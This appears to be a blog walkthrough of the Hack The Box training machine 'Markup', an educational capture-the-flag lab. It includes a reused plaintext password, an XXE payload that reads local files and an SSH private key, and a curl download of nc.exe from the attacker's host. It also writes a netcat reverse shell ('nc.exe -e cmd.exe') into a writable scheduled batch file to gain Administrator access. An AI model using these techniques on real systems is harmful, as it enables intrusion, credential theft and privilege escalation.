Pages

Search

HTB Starting Point – Markup

 $./ennumeration.sh

[+] 10.10.10.49 scan started...
[-] Open ports : 22,80,443 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-31 17:27 CEST
Nmap scan report for 10.10.10.49
Host is up (0.071s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.67 seconds
[+] 10.10.10.49 scan finished...

Open ports:

  • 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
  • 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)

$gobuster dir -u http://10.10.10.49 -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.49
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/31 18:13:48 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com2 (Status: 403)
/com1 (Status: 403)
/com3 (Status: 403)
/con (Status: 403)
/images (Status: 301)
/Images (Status: 301)
/index.php (Status: 200)
/licenses (Status: 403)
/lpt1 (Status: 403)
/lpt2 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 403)
/prn (Status: 403)
/server-info (Status: 403)
/server-status (Status: 403)
/webalizer (Status: 403)
===============================================================
2020/05/31 18:15:21 Finished
===============================================================

Apache service is running. Let’s try to access the site.

Access to http://10.10.10.49

In the previous machine, we found credentials stored in an SQL dump.  Let’s try to reuse them, to log into the application. 

The credentials daniel : >SNDv*2wzLWf are found to be valid and let us into the application.

Foothold

Start Burp and order something.

Data is processed in XML format. We should try if there is an XXE (XML External Entity) vulnerability we can use. 

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

Let’s try if it is vulnerable. As we are on a Windows system we can use: 

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<order>xxx</order>

It works! 

The services.php source code, reveals a username Daniel.

As port 22 is open we can try to use the SSH server. 
SSH private keys are usually stored in C:\Users\username\.ssh\id_rsa.

As we already know about XXE let’s try if we can get Daniel’s SSH key.

Create a new file (id_rsa) with this data.

chmod 400
ssh -i id_rsa daniel@10.10.10.49

daniel@MARKUP C:\Users\daniel\Desktop>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\Users\daniel\Desktop

03/05/2020  07:18 AM    <DIR>          .
03/05/2020  07:18 AM    <DIR>          ..
03/05/2020  07:18 AM                35 user.txt    
               1 File(s)             35 bytes      
               2 Dir(s)  13,747,978,240 bytes free

daniel@MARKUP C:\Users\daniel\Desktop>type user.txt

032dXXXXXXXXXXXXXXXXXXXXXXXXXXXX 

Privilege escalation

daniel@MARKUP C:\>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\

03/12/2020  03:56 AM    <DIR>          Log-Management
09/15/2018  12:12 AM    <DIR>          PerfLogs
03/05/2020  05:35 AM    <DIR>          Program Files
09/15/2018  12:21 AM    <DIR>          Program Files (x86)
03/05/2020  05:40 AM    <DIR>          Users
03/05/2020  01:23 AM    <DIR>          Windows
03/05/2020  10:15 AM    <DIR>          xampp
               0 File(s)              0 bytes
               7 Dir(s)  13,744,549,888 bytes free

daniel@MARKUP C:\Log-Management>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\Log-Management

03/12/2020  03:56 AM    <DIR>          .
03/12/2020  03:56 AM    <DIR>          ..
03/06/2020  02:42 AM               346 job.bat
               1 File(s)            346 bytes
               2 Dir(s)  13,745,532,928 bytes free

daniel@MARKUP C:\Log-Management>job.bat

You must run this script as an Administrator!
Connection to 10.10.10.49 closed.

daniel@MARKUP C:\Log-Management>type job.bat

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit

Icacls

Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

daniel@MARKUP C:\Log-Management>icacls job.bat

job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

Looking at the permissions of job.bat using icacls it reveals that the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users group represents all local users. (Also daniel)

A built-in group. After the initial installation of the operating system, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer.
Users can perform tasks such as running applications, using local and network printers, shutting down the computer, and locking the computer.
Users can install applications that only they are allowed to use if the installation program of the application supports the per-user installation.
This group cannot be renamed, deleted, or moved.
Default User Rights: None

https://ss64.com/nt/syntax-security_groups.html

We can get a shell by transferring netcat to the system and modifying the script to execute a reverse shell.

$ python3 -m http.server 8000
$cp /usr/share/windows-binaries/nc.exe ~/htb/markup/

daniel@MARKUP C:\Users\daniel>curl http://10.10.14.9:8000/nc.exe -o c:\users\daniel\nc.exe

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 59392  100 59392    0     0  59392      0  0:00:01 --:--:--  0:00:01  132k

daniel@MARKUP C:\Users\daniel>echo C:\Users\daniel\nc.exe -e cmd.exe 10.10.14.9 1234 > C:\Log-Management\job.bat

The next time this scheduled job runs, a reverse shell with Administrator privileges should be received.

C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\Users\Administrator\Desktop

03/05/2020  07:33 AM    <DIR>          .
03/05/2020  07:33 AM    <DIR>          ..
03/05/2020  07:33 AM                70 root.txt
               1 File(s)             70 bytes
               2 Dir(s)  13,453,561,856 bytes free

C:\Users\Administrator\Desktop>type root.txt

f574XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *